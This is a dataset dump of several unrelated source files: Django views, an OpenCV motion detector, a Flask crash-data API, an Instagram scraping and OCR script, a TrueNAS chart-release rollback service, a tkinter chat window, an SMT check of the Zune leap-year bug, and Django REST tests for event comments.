Equipment.objects.filter(pk=eq_id).update(**d)\n            eq = Equipment.objects.get(pk=eq_id)\n            if eq.equipmentType == Equipment.TYPE_STANDART_WORK:\n                try:\n                    eq.duration = form.cleaned_data[\"duration\"]\n                except:\n                    messages.error(request, \"Не получилось задать длительность работы\")\n            else:\n                try:\n                    eq.code = form.cleaned_data[\"code\"]\n                except:\n                    messages.error(request, \"Не получилось задать шифр изделия\")\n            eq.scheme.clear()\n            for e in form.cleaned_data[\"scheme\"]:\n                eq.scheme.add(e)\n            eq.save()\n            equipment_formset = EquipmentFormset(request.POST, request.FILES, prefix='equipment')\n            eq.addFromFormset(equipment_formset, True)\n            gen_formset = EquipmentFormset(request.POST, request.FILES, prefix='gen')\n            eq.addGenEquipmentFromFormset(gen_formset, True)\n\n    ef = EquipmentConstructorForm(instance=Equipment.objects.get(pk=eq_id), initial={'scheme': eq.getSchemeChoices()},\n                                  prefix=\"main_form\")\n    ef.fields[\"equipmentType\"].initial = eq.equipmentType\n\n    # print(eq.generateDataFromNeedStructs())\n    # print( EquipmentFormset(initial=eq.generateDataFromNeedStructs(), prefix='equipment'))\n    c = {'equipment_formset': EquipmentFormset(initial=eq.generateDataFromNeedStructs(), prefix='equipment'),\n         'gen_formset': EquipmentFormset(initial=eq.generateDataFromGenEquipment(), prefix='gen'),\n         'login_form': LoginForm(),\n         'one': '1',\n         'form': ef,\n         'eqType': eq.equipmentType,\n         'tsw': Equipment.TYPE_STANDART_WORK,\n         'eq_id': eq_id,\n         'area_id': Area.objects.first().pk,\n         'formsetNames': ['equipment', 'gen'],\n         'pageTitleHeader': 'Конструкторам',\n         }\n    return render(request, \"constructors/detail.html\", c)\n\n\n# delete constructor equipment\ndef deleteConstructorEquipment(request, eq_id):\n    eq = Equipment.objects.get(pk=eq_id)\n    eq.stockStruct.clear()\n    eq.delete()\n    return HttpResponseRedirect('/constructors/tehnology/')\n\n\n# list of drawings\ndef shemes(request):\n    if request.method == 'POST':\n        # build the form from the request\n        form = SchemeSingleForm(request.POST, prefix=\"single-scheme\")\n        # if the form was filled in correctly\n        if form.is_valid():\n            return HttpResponseRedirect('/constructors/sheme/detail/' + str(form.cleaned_data[\"scheme\"]) + '/')\n\n    return render(request, \"constructors/shemesList.html\", {\n        'login_form': LoginForm(),\n        'schs': Scheme.objects.all(),\n        'one': '1',\n        'addForm': SchemeForm(prefix=\"add-scheme\"),\n        'chooseForm': SchemeSingleForm(prefix=\"single-scheme\"),\n        'area_id': Area.objects.first().pk,\n        'pageTitleHeader': 'Конструкторам',\n        'chooseHeader': 'Выберите чертёж, который Вы хотите редактировать',\n    })\n\n\n# Add a drawing\ndef addScheme(request):\n    if request.method == \"POST\":\n        # drawing creation form\n        form = SchemeForm(request.POST, prefix='add-scheme')\n        # if the form was filled in correctly\n        if form.is_valid():\n            code = form.cleaned_data[\"code\"]\n            sch = Scheme.objects.create(link=form.cleaned_data[\"link\"], author=form.cleaned_data[\"author\"])\n            sch.save()\n            if (code is not None):\n                sch.code = code\n                sch.save()\n            return HttpResponseRedirect('/constructors/sheme/detail/' + str(sch.pk) + '/')\n    return HttpResponseRedirect('/constructors/work/')\n\n\n# Drawing details\ndef shemeDetail(request, sh_id):\n    if request.method == \"POST\":\n        # drawing editing form\n        form = SchemeForm(request.POST)\n        # if the form was filled in correctly\n        if form.is_valid():\n            sch = Scheme.objects.get(pk=sh_id)\n            code = form.cleaned_data[\"code\"]\n            sch.link = form.cleaned_data[\"link\"]\n            sch.author = form.cleaned_data[\"author\"]\n            if (code is not None):\n                sch.code = 
code\n                sch.save()\n\n    return render(request, \"constructors/shemesDetail.html\", {\n        'login_form': LoginForm(),\n        'form': SchemeForm(instance=Scheme.objects.get(pk=sh_id)),\n        'area_id': Area.objects.first().pk,\n        'pageTitleHeader': 'Конструкторам',\n    })\n","sub_path":"constructors/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"328870923","text":"import numpy as np\nimport cv2\nfrom time import sleep\nimport imutils\n\n# 0, -1 for single camera, 1 for secondary camera\ncam = cv2.VideoCapture(-1)\nprint('Camera: ', cam)\nprint('Is Camera opened: ', cam.isOpened())\n\n\nprint('Beginning to capture video...')\n\nfirstFrame = None\n\nwhile(True):\n\n    text = \"Unoccupied\"\n\n    # ret => return value(T/F) whether frame is captured or not\n\n    ret, frame = cam.read()\n    frame = imutils.resize(frame, width=500)\n\n    # frame = cv2.flip(frame,-1)\n    # 0 means flipping around the x-axis and positive value (like 1) means\n    # flipping around y-axis. Negative value (like -1) means flipping around both axes\n\n    # convert the image to grayscale and apply a blur\n    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n    gray = cv2.GaussianBlur(gray, (21, 21), 0)\n\n    #gray = cv2.flip(gray,-1)\n\n    if firstFrame is None:\n        firstFrame = gray\n\n    # take the difference b/w the current and the previous frame.\n    frameDelta = cv2.absdiff(firstFrame, gray)\n\n    # take a threshold to get a binary image.\n    # dilate the obtained image to fill up the gaps\n    thresh = cv2.threshold(frameDelta, 25, 255, cv2.THRESH_BINARY)[1]\n    thresh = cv2.dilate(thresh, None, iterations=2)\n\n    # find the blobs\n    _, cnts, _ = cv2.findContours(thresh.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n    # if the blob is greater than some threshold then, we assume the room is occupied\n    for c in cnts:\n        if cv2.contourArea(c) < 900:\n            continue\n        (x, y, w, h) = cv2.boundingRect(c)\n        cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)\n        text = \"Occupied\"\n\n    # put the text on the image\n    cv2.putText(frame, \"Room Status: {}\".format(text), (10, 20),\n                cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)\n\n    # displays the frames in their respective window\n    cv2.imshow('FRAME', frame)\n    cv2.imshow(\"Thresh\", thresh)\n    firstFrame = gray\n\n    # waitKey waits for 1 millisecond and listens to the keyboard;\n    # if 'q' is pressed, exit the loop\n    if cv2.waitKey(1) & 0xFF == ord('q'):\n        break\n\n\n# it is essential to release the camera stream and destroy all the windows\ncam.release()\ncv2.destroyAllWindows()\n\n\n# NOTE:\n# the features implemented in cv2.videoCapture() need the V4L2(Video 4 Linux) drivers.\n# to activate v4l drivers: sudo modprobe bcm2835-v4l2\n# to set the capture format for video: (unless we set this, cv2.VideoCapture doesn't work)\n# v4l2-ctl --set-fmt-video=width=1920,height=1088,pixelformat=4\n# not sure why it still returns a warning/error message\n# when cv2.VideoCapture is called\n\n# few other commands of v4l lib are: (for more info on v4l visit: https://github.com/raspberrypi/linux/blob/rpi-3.10.y/Documentation/video4linux/bcm2835-v4l2.txt)\n# to list different formats available to record/capture: v4l2-ctl --list-formats\n\n# Some important commands:\n# img = cv2.imread('test.jpg', 0) --used to read image from a given file, 0 - converts to grayscale, 1 - to display as it is\n# cv2.namedWindow('image', cv2.WINDOW_NORMAL) --used to create a window\n# cv2.waitKey(0) --waits indefinitely for a user 
key-press\n","sub_path":"motion_detect.py","file_name":"motion_detect.py","file_ext":"py","file_size_in_byte":3135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"537454253","text":"import sqlalchemy\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, Float\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify, render_template\n\n################################\n#### Connection to Database ####\n################################\n\n# Create our session (link) from Python to the DB\nengine = create_engine(\"sqlite:///airplanestocks.sqlite\")\n\nsession = Session(engine)\n# reflect an existing database into a new model\nBase = declarative_base()\n\n#Declare the bases because automap doesn't work\nclass AmericanCrashes(Base):\n __tablename__ = \"american_crashes\"\n id = Column(Integer, primary_key = True)\n date = Column(String(10))\n manufacturer = Column(String(255))\n carrier = Column(String(255))\n fatalities = Column(Integer)\n location = Column(String(255))\n \nclass AllCrashes(Base):\n __tablename__ = \"all_crashes\"\n id = Column(Integer, primary_key = True)\n date = Column(String(10))\n manufacturer = Column(String(255))\n carrier = Column(String(255))\n fatalities = Column(Integer)\n location = Column(String(255)) \n\n####################################\n############# Flask ################\n####################################\napp = Flask(__name__)\n\n@app.route('/api')\ndef api():\n return render_template('api.html')\n\n@app.route('/api/american_carriers')\ndef american_crashes():\n engine = create_engine(\"sqlite:///airplanestocks.sqlite\")\n\n session = Session(engine)\n \n results = session.query(AmericanCrashes.date, AmericanCrashes.manufacturer, AmericanCrashes.carrier, AmericanCrashes.fatalities, AmericanCrashes.location).all()\n american_carriers = []\n for result in results:\n american_dict = {}\n american_dict['date'] = result.date\n american_dict['manufacturer'] = result.manufacturer\n american_dict['carrier'] = result.carrier\n american_dict['fatalities'] = result.fatalities\n american_dict['location'] = result.location\n american_carriers.append(american_dict)\n \n return jsonify(american_carriers)\n\n\n@app.route('/api/all_carriers')\ndef all_crashes():\n engine = create_engine(\"sqlite:///airplanestocks.sqlite\")\n\n session = Session(engine)\n \n results = session.query(AllCrashes.date, AllCrashes.manufacturer, AllCrashes.carrier, AllCrashes.fatalities, AllCrashes.location).all()\n \n airline_carriers = []\n for date, manufacturer, carrier, fatalities, location in results:\n airline_dict = {}\n airline_dict['date'] = date\n airline_dict['manufacturer'] = manufacturer\n airline_dict['carrier'] = carrier\n airline_dict['fatalities'] = fatalities\n airline_dict['location'] = location\n airline_carriers.append(airline_dict)\n \n return jsonify(airline_carriers) \n\n@app.route('/stock_impact')\ndef stock_impact():\n return render_template('stock_impact.html')\n\n@app.route('/crashdata')\ndef crash(): \n return render_template('crashdata.html')\n\n@app.route('/stock_comparison')\ndef datastock():\n return render_template('stock_comparison.html')\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n \nif __name__ == '__main__':\n app.run(debug=True, port = 5000) 
","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"166140021","text":"from datetime import datetime, timedelta\n\nfrom fuzzywuzzy import process\n\nimport InstagramScraper\nimport OCR\nimport database\n\nif __name__ == '__main__':\n # Define the Download Profile\n profile = {\n \"directory\": \"C:\\\\Users\\\\bett3\\\\Desktop\\\\Projects\\\\Hottest100\\\\InstagramData\\\\\"\n , \"hashtags\": ['hottest100', 'triplej']\n , \"start_datetime\": datetime.now() - timedelta(days=15)\n , \"end_datetime\": datetime.now()\n , \"get_videos\": False\n , \"get_videos_only\": False\n , \"get_post_json\": True\n , \"get_post_json_only\": False\n }\n\n # Execute the Downloader\n IL = InstagramScraper.Scraper(profile)\n IL.download()\n\n # Run the OCR\n cxn = database.connection()\n cxn.connect()\n processed_images = cxn.get_processed_votes()\n OCR.process_images(profile['directory'], processed_images)\n\n # Retrieve the results from OCR, match to valid songs\n song_list = cxn.get_song_list()\n votes = cxn.get_raw_votes()\n for vote in votes:\n Post_ID = vote[0]\n OCR_Artist_Track_Name = vote[1]\n Match = process.extractOne(OCR_Artist_Track_Name, song_list)\n Match_Artist_Track_Name = Match[0]\n Match_Likelihood = Match[1]\n cxn.insert_match_results(Post_ID, OCR_Artist_Track_Name, Match_Artist_Track_Name, Match_Likelihood)\n cxn.set_vote_processed()\n cxn.disconnect()\n print('Finished at ' + str(datetime.now()))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"169350624","text":"import errno\nimport os\nimport shutil\n\nfrom pkg_resources import parse_version\n\nfrom middlewared.schema import Bool, Dict, Str\nfrom middlewared.service import accepts, CallError, job, private, Service\n\nfrom .utils import get_namespace, run\n\n\nclass ChartReleaseService(Service):\n\n class Config:\n namespace = 'chart.release'\n\n @accepts(\n Str('release_name'),\n Dict(\n 'rollback_options',\n Bool('force', default=False),\n Bool('rollback_snapshot', default=True),\n Str('item_version', required=True),\n )\n )\n @job(lock=lambda args: f'chart_release_rollback_{args[0]}')\n async def rollback(self, job, release_name, options):\n \"\"\"\n Rollback a chart release to a previous chart version.\n\n `item_version` is version which we want to rollback a chart release to.\n\n `rollback_snapshot` is a boolean value which when set will rollback snapshots of ix_volumes.\n\n `force` is a boolean passed to helm for rollback of a chart release and also used for rolling back snapshots\n of ix_volumes.\n\n It should be noted that rollback is not possible if a chart release is using persistent volume claims\n as they are immutable.\n Rollback is only functional for the actual configuration of the release at the `item_version` specified and\n any associated `ix_volumes`.\n \"\"\"\n await self.middleware.call('kubernetes.validate_k8s_setup')\n release = await self.middleware.call(\n 'chart.release.query', [['id', '=', release_name]], {\n 'extra': {'history': True, 'retrieve_resources': True}, 'get': True,\n }\n )\n rollback_version = options['item_version']\n if rollback_version not in release['history']:\n raise CallError(\n f'Unable to find {rollback_version!r} item version in {release_name!r} history', errno=errno.ENOENT\n )\n\n chart_path = 
os.path.join(release['path'], 'charts', rollback_version)\n if not await self.middleware.run_in_thread(lambda: os.path.exists(chart_path)):\n raise CallError(f'Unable to locate {chart_path!r} path for rolling back', errno=errno.ENOENT)\n\n chart_details = await self.middleware.call('catalog.item_version_details', chart_path)\n await self.middleware.call('catalog.version_supported_error_check', chart_details)\n\n history_item = release['history'][rollback_version]\n history_ver = str(history_item['version'])\n\n ix_volumes_ds = os.path.join(release['dataset'], 'volumes/ix_volumes')\n snap_name = f'{ix_volumes_ds}@{history_ver}'\n if not await self.middleware.call('zfs.snapshot.query', [['id', '=', snap_name]]) and not options['force']:\n raise CallError(\n f'Unable to locate {snap_name!r} snapshot for {release_name!r} volumes', errno=errno.ENOENT\n )\n\n current_dataset_paths = {\n os.path.join('/mnt', d['id']) for d in await self.middleware.call(\n 'zfs.dataset.query', [['id', '^', f'{ix_volumes_ds}/']]\n )\n }\n history_datasets = {d['hostPath'] for d in history_item['config'].get('ixVolumes', [])}\n if history_datasets - current_dataset_paths:\n raise CallError(\n 'Please specify a rollback version where following iX Volumes are not being used as they don\\'t '\n f'exist anymore: {\", \".join(d.split(\"/\")[-1] for d in history_datasets - current_dataset_paths)}'\n )\n\n job.set_progress(25, 'Initial validation complete')\n\n # TODO: Upstream helm does not have ability to force stop a release, until we have that ability\n # let's just try to do a best effort to scale down scaleable workloads and then scale them back up\n scale_stats = await self.middleware.call('chart.release.scale', release_name, {'replica_count': 0})\n job.set_progress(45, 'Scaled down workloads')\n\n command = []\n if options['force']:\n command.append('--force')\n\n try:\n cp = await run(\n [\n 'helm', 'rollback', release_name, history_ver, '-n',\n get_namespace(release_name), '--recreate-pods'\n ] + command, check=False,\n )\n if cp.returncode:\n raise CallError(\n f'Failed to rollback {release_name!r} chart release to {rollback_version!r}: {cp.stderr.decode()}'\n )\n finally:\n await self.middleware.call('chart.release.sync_secrets_for_release', release_name)\n\n # We are going to remove old chart version copies\n await self.middleware.call(\n 'chart.release.remove_old_upgraded_chart_version_copies',\n os.path.join(release['path'], 'charts'), rollback_version,\n )\n\n if options['rollback_snapshot']:\n await self.middleware.call(\n 'zfs.snapshot.rollback', snap_name, {\n 'force': options['force'],\n 'recursive': True,\n 'recursive_clones': True,\n }\n )\n\n await self.middleware.call(\n 'chart.release.scale_release_internal', release['resources'], None, scale_stats['before_scale'], True,\n )\n\n job.set_progress(100, 'Rollback complete for chart release')\n\n await self.middleware.call('chart.release.chart_releases_update_checks_internal', [['id', '=', release_name]])\n\n return await self.middleware.call('chart.release.get_instance', release_name)\n\n @private\n def remove_old_upgraded_chart_version_copies(self, charts_path, current_version):\n c_v = parse_version(current_version)\n for v_path in filter(lambda p: p != current_version, os.listdir(charts_path)):\n if parse_version(v_path) > c_v:\n shutil.rmtree(path=os.path.join(charts_path, v_path), 
ignore_errors=True)\n","sub_path":"src/middlewared/middlewared/plugins/chart_releases_linux/rollback.py","file_name":"rollback.py","file_ext":"py","file_size_in_byte":6009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"416683810","text":"from tkinter import Toplevel\r\nfrom tkinter.scrolledtext import ScrolledText\r\nfrom tkinter import Text\r\nfrom tkinter import Button\r\nfrom tkinter import END\r\nfrom tkinter import UNITS\r\nfrom time import localtime,strftime,time\r\n# We cannot use class WindowChat(Tk) because only one root window is allowed,\r\n# but we can have multiple Toplevel windows\r\n\r\nclass WindowChat(Toplevel):\r\n    def __init__(self):\r\n        super(WindowChat,self).__init__()\r\n        self.geometry('795x505')\r\n        self.resizable(False,False)\r\n        # add the widgets\r\n        self.add_widget()\r\n    def add_widget(self):\r\n        # chat area\r\n        # create a scrollable text area (a main window that contains many small windows)\r\n        chat_text_area = ScrolledText(self)\r\n        chat_text_area['width']=110\r\n        chat_text_area['height']=30\r\n        # the window has two rows (input area and button),\r\n        # so the first row has to be aligned with the second row: columnspan=2\r\n\r\n        chat_text_area.grid(row=0,column=0,columnspan=2)\r\n        # 'green' is a tag that sets the text colour to green; all text with this tag is green\r\n\r\n        chat_text_area.tag_config('green',foreground='green')\r\n        chat_text_area.tag_config('system',foreground='red')\r\n        # then save this area in the children dictionary like the other widgets\r\n\r\n        self.children['chat_text_area']=chat_text_area\r\n        # input area\r\n        chat_input_area=Text(self,name='chat_input_area')\r\n        chat_input_area['width'] = 100\r\n        chat_input_area['height'] = 7\r\n        chat_input_area.grid(row=1,column=0,pady=10)\r\n        # send area\r\n        send_button=Button(self,name='send_button')\r\n        send_button['text']='send'\r\n        send_button['width']=5\r\n        send_button['height']=2\r\n        send_button.grid(row=1,column=1)\r\n    def set_title(self,title):\r\n        self.title(\"Welcome %s!\" %title)\r\n    def on_send_button_click(self,command):\r\n        # clicking the send button executes the given command\r\n\r\n        self.children['send_button']['command']=command\r\n    def get_inputs(self):\r\n        # get the message from the input area to send it to the chat room;\r\n        # the input area is a Text widget, so we can read its value with get()\r\n\r\n        return self.children['chat_input_area'].get(0.0,END)\r\n    def clear_input(self):\r\n        # clear the input box\r\n\r\n        self.children['chat_input_area'].delete(0.0,END)\r\n    def append_message(self,sender,message):\r\n        # append a message to the chat area:\r\n        # first show who sent it, then show the message itself\r\n\r\n        send_time = strftime('%Y-%m-%d %H:%M:%S',localtime(time()))\r\n        send_info='%s:%s\\n' % (sender,send_time)\r\n        # the insert position is END\r\n\r\n        self.children['chat_text_area'].insert(END,send_info,'green')\r\n        self.children['chat_text_area'].insert(END,' '+message+'\\n')\r\n\r\n        # automatically scroll the screen down\r\n        self.children['chat_text_area'].yview_scroll(3,UNITS)\r\n    def on_window_close(self,command):\r\n        # close the window and release the resources\r\n\r\n        self.protocol('WM_DELETE_WINDOW',command)\r\nif __name__ == '__main__':\r\n    WindowChat().mainloop()","sub_path":"mini_chat/client/window_chat.py","file_name":"window_chat.py","file_ext":"py","file_size_in_byte":3060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"313903017","text":"import numpy as np\nimport matplotlib.pyplot as 
plt\nimport math\nimport cv2\n\nimport midi\n\nclass Visualizer:\n    def __init__(self):\n        pass\n\n    @staticmethod\n    def visualize_samples(samples: np.array):\n        print(samples.shape)\n        vis_samples = np.concatenate(samples, axis=0)\n        vis_samples = vis_samples.transpose([1, 0])\n        print(vis_samples.shape)\n\n        cv2.imshow(\"samples\", vis_samples*255)\n        cv2.waitKey(0)\n\nif __name__ == '__main__':\n    file = 'vgmusic/Nintendo 08 DS/DESTINY.mid'\n\n    runner = midi.MidiRunner(file)\n    samples = runner.midi_to_samples()\n\n    vis = Visualizer()\n    vis.visualize_samples(samples)","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"220454411","text":"#!/usr/bin/env python\nimport os\nimport sys\nsys.path.insert(1, os.path.abspath('..'))\n\n\n#---------------------------------------------------------------------------------------------------\n# VERIFICATION EXAMPLE: ZUNE BUG\n#---------------------------------------------------------------------------------------------------\n# This example presents the use of SMT solvers to verify code containing the well-known Zune bug.\n#\n#\n# NOTE: This example is currently work in progress and is not yet working.\n#---------------------------------------------------------------------------------------------------\n\nfrom pysv import smt_verifier\nfrom pysv import contract\n\n\"\"\"\nORIGINAL ZUNE BUG CODE:\nORIGINYEAR = 1980 (1980 was a leap year)\ninput: days (number of days since ORIGINYEAR)\n-----------------------------------\n\nyear = ORIGINYEAR;\nwhile (days > 365)\n{\n    if (IsLeapYear(year))\n    {\n        if (days > 366)\n        {\n            days -= 366;\n            year += 1;\n        }\n        # lack of else statement - not ending loop for 366'th day in a leap year\n    }\n    else\n    {\n        days -= 365;\n        year += 1;\n    }\n}\n\"\"\"\n\n# Only one leap\nzune_simplified = \"\"\"\n#year = 1980\n#if days > 365: # handled by precondition\ndays2 = days\nyear2 = year\nif year % 4 == 0:\n    if days > 366:\n        days2 = days - 366\n        year2 = year + 1\n    # lack of else statement\nelse:\n    days2 = days - 365\n    year2 = year + 1\n\"\"\"\ninput_vars = contract.ProgramVars({\"days\" : 'Int', \"year\" : 'Int'})\npre = \"days > 365 and year >= 1980\"\n# For this postcondition the program doesn't meet the specification, because the postcondition\n# is based on user intent and the code has a bug.\n# post = \"((not days == 366 or not year == 1980) or (year2 == 1980 and days2 == 0)) and \" +\\\n#        \"((not days == 366 or not year == 1981) or (year2 == 1982 and days2 == 1))\"\n\n# For this postcondition the program meets the specification, because the postcondition\n# is based on the code.\n#post = \"((not days == 366 or not year == 1980) or (year2 == 1980 and days2 == 366)) and \" +\\\n#       \"((not days == 366 or not year == 1981) or (year2 == 1982 and days2 == 1))\"\nt1 = ([\"days == 366\", \"year == 1980\"], [\"year2 == 1980\", \"days2 == 366\"])\nt2 = ([\"days == 366\", \"year == 1981\"], [\"year2 == 1982\", \"days2 == 1\"])\npost = contract.formula_test_cases_py([t1, t2])\n\n\ndays = 9\nyear = 1980\nif year % 4 == 0:\n    if days > 366:\n        days -= 366\n        year += 1\n    else:\n        days -= 365\n        year += 1\n","sub_path":"examples/ver_zune.py","file_name":"ver_zune.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"76462122","text":"from django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom 
+{"seq_id":"76462122","text":"from django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom django.test import TestCase\nfrom django.utils.timezone import make_aware, localtime\nimport datetime\n\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\n\nfrom core.models import Event, EventComment\n\n\ndef detail_url(event_id):\n    \"\"\"Return detail event comment URL\"\"\"\n    return reverse('event:eventComment', args=[event_id])\n\n\ndef delete_url(event_id, comment_id):\n    \"\"\"Return delete event comment URL\"\"\"\n    return reverse('event:deleteComment', args=[event_id, comment_id])\n\n\ndef sample_user(**params):\n    \"\"\"Create and return a sample user\"\"\"\n    return get_user_model().objects.create_user(**params)\n\n\ndef sample_event(user):\n    \"\"\"Create and return a sample event\"\"\"\n    default = {\n        'title': 'test title',\n        'description': 'test description',\n        'image': None,\n        'event_time': make_aware(datetime.datetime.now())\n        .strftime('%Y-%m-%d %H:%M:%S'),\n        'address': 'test address',\n        'fee': 500,\n        'status': '1',\n    }\n\n    return Event.objects.create(organizer=user, **default)\n\n\ndef sample_event_comment(event, user, comment='test comment'):\n    \"\"\"Create and return a sample event comment\"\"\"\n    default = {'event': event, 'user': user, 'comment': comment}\n    return EventComment.objects.create(**default)\n\n\ndef get_event_comment_by_json(**params):\n\n    event_comment = EventComment.objects.get(id=params['id'])\n    expected_json_dict = {\n        'id': event_comment.id,\n        'user': {\n            'first_name': event_comment.user.first_name,\n            'is_active': event_comment.user.is_active,\n            'icon': None\n        },\n        'comment': event_comment.comment,\n        'brief_updated_at': localtime(event_comment.updated_at)\n        .strftime('%Y-%m-%d %H:%M:%S')\n    }\n    return expected_json_dict\n\n\nclass PublicEventCommentApiTests(TestCase):\n    \"\"\"Test the publicly available event comments API\"\"\"\n\n    def setUp(self):\n        self.user = sample_user(\n            email='test@matsuda.com',\n            password='testpass',\n            first_name='test'\n        )\n        self.event = sample_event(self.user)\n        self.event_comment = sample_event_comment(self.event, self.user)\n        self.deleted_comment = sample_event_comment(self.event, self.user)\n        self.deleted_comment.delete()\n        self.deleted_comment.refresh_from_db()\n        self.client = APIClient()\n\n    def test_retrieve_event_comment_success(self):\n        \"\"\"Test retrieving event comments\"\"\"\n        url = detail_url(self.event.id)\n        res = self.client.get(url, {'page': 1})\n        self.assertEqual(res.status_code, status.HTTP_200_OK)\n\n        event_comments = EventComment.objects.filter(\n            is_active=True).order_by('updated_at')\n        expected_json_dict_list = []\n        for event_comment in event_comments:\n            expected_json_dict = {\n                'id': event_comment.id,\n                'event': event_comment.event.id,\n                'user': event_comment.user.id,\n                'first_name': event_comment.user.first_name,\n                'icon': event_comment.user.get_icon_url,\n                'comment': event_comment.comment,\n                'brief_updated_at': event_comment.get_brief_updated_at\n            }\n            expected_json_dict_list.append(expected_json_dict)\n\n        expected_json = {\n            \"count\": len(event_comments),\n            \"next\": None,\n            \"previous\": None,\n            \"results\": expected_json_dict_list\n        }\n        self.assertJSONEqual(res.content, expected_json)\n\n    def test_retrieve_event_comment_pagination_success(self):\n        \"\"\"Test retrieving event comments with pagination\"\"\"\n        count = 0\n        while count < 15:\n            sample_event_comment(self.event, self.user)\n            count += 1\n\n        url = detail_url(self.event.id)\n        res = self.client.get(url, {'page': 1})\n        self.assertEqual(res.status_code, status.HTTP_200_OK)\n        self.assertEqual(len(res.data['results']), 15)\n\n        res = self.client.get(url, {'page': 2})\n        self.assertEqual(res.status_code, status.HTTP_200_OK)\n        self.assertEqual(len(res.data['results']), 1)\n\n    def test_retrieve_event_comment_pagination_false(self):\n        \"\"\"Test retrieving event comments fails for invalid pages\"\"\"\n        url = detail_url(self.event.id)\n        res = self.client.get(url, {'page': 0})\n        self.assertEqual(res.status_code, status.HTTP_404_NOT_FOUND)\n\n        res = self.client.get(url, {'page': 2})\n        self.assertEqual(res.status_code, status.HTTP_404_NOT_FOUND)\n\n    def test_not_retrieve_deleted_comments(self):\n        \"\"\"Test not retrieving deleted comments\"\"\"\n        url = detail_url(self.event.id)\n        res = self.client.get(url, {'page': 1})\n        self.assertEqual(res.status_code, status.HTTP_200_OK)\n\n        expected_json_dict = {\n            'id': self.event_comment.id,\n            'event': self.event_comment.event.id,\n            'user': self.event_comment.user.id,\n            'first_name': self.event_comment.user.first_name,\n            'icon': self.event_comment.user.get_icon_url,\n            'comment': self.event_comment.comment,\n            'brief_updated_at': self.event_comment.get_brief_updated_at\n        }\n        self.assertIn(expected_json_dict, list(res.data['results']))\n        self.assertEqual(dict(res.data['results'][0]), expected_json_dict)\n\n    def test_create_event_comment_for_unauthorized_user(self):\n        \"\"\"Test that an unauthenticated user cannot create an event comment\"\"\"\n        payload = {\n            'comment': 'testcomment',\n        }\n        url = detail_url(self.event.id)\n        res = self.client.post(url, payload)\n        self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)\n\n    def test_delete_event_comment_for_unauthorized_user(self):\n        \"\"\"Test that an unauthenticated user cannot delete an event comment\"\"\"\n        url = delete_url(self.event.id, self.event_comment.id)\n        res = self.client.delete(url)\n        self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass PrivateEventCommentApiTests(TestCase):\n    \"\"\"Test the authorized user Event comment API\"\"\"\n\n    def setUp(self):\n        self.client = APIClient()\n        self.organizer = sample_user(\n            email='test@matsuda.com',\n            password='testpass',\n            first_name='test'\n        )\n        self.comment_user = sample_user(\n            email='test2@matsuda.com',\n            password='testpass2',\n            first_name='testtest'\n        )\n        self.event = sample_event(self.organizer)\n        self.private_event = sample_event(self.organizer)\n        self.private_event.status = '0'\n        self.private_event.save()\n        self.organizer_comment = sample_event_comment(\n            self.event, self.organizer)\n        self.event_comment = sample_event_comment(\n            self.event, self.comment_user)\n        self.client.force_authenticate(self.organizer)\n\n    def test_create_event_comment_successful(self):\n        \"\"\"Test creating a new event comment\"\"\"\n        str_comment = 'test_create_event_comment_successful'\n        payload = {\n            'comment': str_comment,\n        }\n        url = detail_url(self.event.id)\n        res = self.client.post(url, payload)\n        self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n\n        new_event_comment = EventComment.objects.latest('updated_at')\n        self.assertEqual(new_event_comment.comment, str_comment)\n\n    def test_not_create_event_comment_to_private_event(self):\n        \"\"\"Test not creating a new comment to private event\"\"\"\n        payload = {\n            'comment': 'testcomment',\n        }\n        url = detail_url(self.private_event.id)\n        res = self.client.post(url, payload)\n        self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)\n\n    def test_not_create_event_comment_to_deleted_event(self):\n        \"\"\"Test not creating a new comment to deleted event\"\"\"\n        self.event.delete()\n\n        payload = {\n            'comment': 'testcomment',\n        }\n        url = detail_url(self.event.id)\n        res = self.client.post(url, payload)\n        self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)\n
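# Hedged sketch of a pagination class consistent with the tests above: 15 comments on
# page 1, the overflow on page 2, and a 404 for out-of-range pages (which DRF's
# PageNumberPagination raises as NotFound by default). The class name is an
# assumption; the actual project may configure pagination differently.
from rest_framework.pagination import PageNumberPagination

class EventCommentPagination(PageNumberPagination):
    page_size = 15  # setUp leaves 1 active comment; the test adds 15 more -> 16 total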
